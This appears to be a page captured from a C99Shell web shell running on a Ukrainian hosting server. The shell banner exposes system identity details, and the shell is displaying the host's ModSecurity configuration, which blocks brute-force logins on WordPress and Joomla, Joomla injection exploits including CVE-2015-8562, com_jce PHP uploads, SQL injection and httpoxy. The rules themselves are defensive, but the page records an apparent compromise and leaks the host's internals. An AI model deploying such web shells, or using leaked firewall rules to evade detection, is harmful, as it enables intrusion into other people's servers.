!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/etc/modsecurity/   drwxr-xr-x
Free 1.52 GB of 7.22 GB (21.11%)

Viewing file:     hvosting.conf (4.45 KB)      -rw-r--r--
# Drop requests from IPs in blocklist
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:1
SecRule ip:bf_drop "@gt 0" "drop,phase:1,nolog,auditlog,id:2,msg:'ip address %{REMOTE_ADDR} blocked'"

# Wordpress
SecRule REQUEST_BASENAME "^xmlrpc\.php$" "chain,nolog,phase:4,t:none,pass,id:200"
SecRule RESPONSE_BODY    "faultString"   "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

SecRule REQUEST_BASENAME "^wp-login\.php$" "chain,phase:2,nolog,t:none,pass,id:210"
SecRule REQUEST_METHOD   "^POST$"          "chain"
SecRule ARGS_POST_NAMES  "^log$"           "chain"
SecRule ARGS_POST_NAMES  "^pwd$"           "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

# Joomla
SecRule REQUEST_FILENAME "^/administrator/index\.php$" "chain,nolog,phase:2,t:none,pass,id:300"
SecRule REQUEST_METHOD   "^POST$"                      "chain"
SecRule ARGS_POST:option "^com_login$"                 "chain"
SecRule ARGS_POST:task   "^login$"                     "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

## joomla 1.5-3.4.4 session code injection (CVE-2015-8562)
SecRule REQUEST_HEADERS:User-Agent "[\}\|]" "phase:1,nolog,auditlog,drop,msg:'forbidden characters in useragent',id:1100"

SecRule REQUEST_HEADERS:User-Agent "@validateUtf8Encoding" "phase:1,nolog,auditlog,drop,msg:'invalid utf8 in useragent',id:1101"

## joomla 2.5 some com_community vulnerability
SecRule REQUEST_METHOD   "^POST$"      "chain,drop,nolog,auditlog,phase:2,t:none,msg:'forbidden com_community argument code execution',id:1103"
SecRule ARGS_POST:option "^community$" "chain"
SecRule ARGS_POST:arg4   "\"call\""

## joomla 1.5-3.4.4, CVE-2015-8562, another approach  (https://blog.sucuri.net/2016/07/new-realstatistics-attack-vector-compromising-joomla-sites.html)
SecRule REQUEST_METHOD          "^POST$"     "chain,phase:1,nolog,auditlog,drop,msg:'forbidden characters in com_tags filter value',id:1105"
SecRule ARGS:option             "^com_tags$" "chain"
SecRule ARGS_POST:filter-search "[}|]"

SecRule REQUEST_METHOD          "^POST$"     "chain,phase:1,nolog,auditlog,drop,msg:'invalid unicode in com_tags filter value',id:1106"
SecRule ARGS:option             "^com_tags$" "chain"
SecRule ARGS_POST:filter-search "@validateUtf8Encoding"

## joomla 1.5 shop.recommend spam requests
SecRule REQUEST_BASENAME "^index2\.php$"      "chain,nolog,auditlog,drop,msg:'denying spam via joomla shop.recommend',id:1109"
SecRule REQUEST_METHOD   "^POST$"             "chain"
SecRule ARGS_POST:func   "^recommendProduct$" "chain"
SecRule ARGS:page        "^shop\.recommend$"

## joomla 1.5? googlemap plugin v2 proxying requests
SecRule REQUEST_FILENAME "^/plugins/system/plugin_googlemap2_proxy\.php$" "chain,nolog,phase:2,t:none,pass,id:1110"
SecRule REQUEST_METHOD   "^(HEAD|GET)$"                "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

## joomla 1.5 com_jce (exploit step 2 - image rename request)
SecRule REQUEST_METHOD "^POST$"       "chain,nolog,auditlog,drop,msg:'block com_jce rename to php request',id:1111"
SecRule ARGS:option    "^com_jce$"    "chain"
SecRule ARGS:task      "^plugin$"     "chain"
SecRule ARGS:plugin    "^imgmanager$" "chain"
SecRule ARGS_POST:json "\.php\""

## joomla com_blog_calendar (http://seclists.org/oss-sec/2016/q4/751)
SecRule ARGS:option    "^com_blog_calendar$" "chain,nolog,auditlog,drop,msg:'block com_blog_calendar sql injection',id:1112"
SecRule ARGS:modid     "[^0-9]"

## joomla com_contact contact form self-cc spam
SecRule REQUEST_METHOD  "^POST$"           "chain,nolog,auditlog,drop,msg:'block com_contact self-cc contact request',id:1113"
SecRule ARGS:option     "^com_contact$"    "chain"
SecRule ARGS:task       "^(contact\.)?submit$" "chain"
SecRule ARGS_POST_NAMES "^(jform\[contact_email_copy\]|email_copy)$" "chain"
SecRule &ARGS:g-recaptcha-response "@eq 0"

## joomla 1.7 com_tag sql injection (https://www.vulnerability-lab.com/get_content.php?id=2061)
SecRule REQUEST_METHOD "^GET$"            "chain,nolog,auditlog,drop,msg:'block com_tag sql injection',id:1114"
SecRule ARGS:option    "^com_tag$"        "chain"
SecRule ARGS:tag       "[^a-zA-Z0-9_.*?+\\-]"

# Httpoxy proxy redirect vulnerability (see http://httpoxy.org)
SecRule &REQUEST_HEADERS:Proxy "@gt 0" "nolog,auditlog,deny,msg:'httpoxy denied',id:1000005"

# Mark IP for blocking, if wrong request counter is over limit
SecRule ip:bf_counter "@gt 4" "nolog,t:none,setvar:ip.bf_drop=1,expirevar:ip.bf_drop=300,setvar:ip.bf_counter=0,id:1000"


--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0363 ]--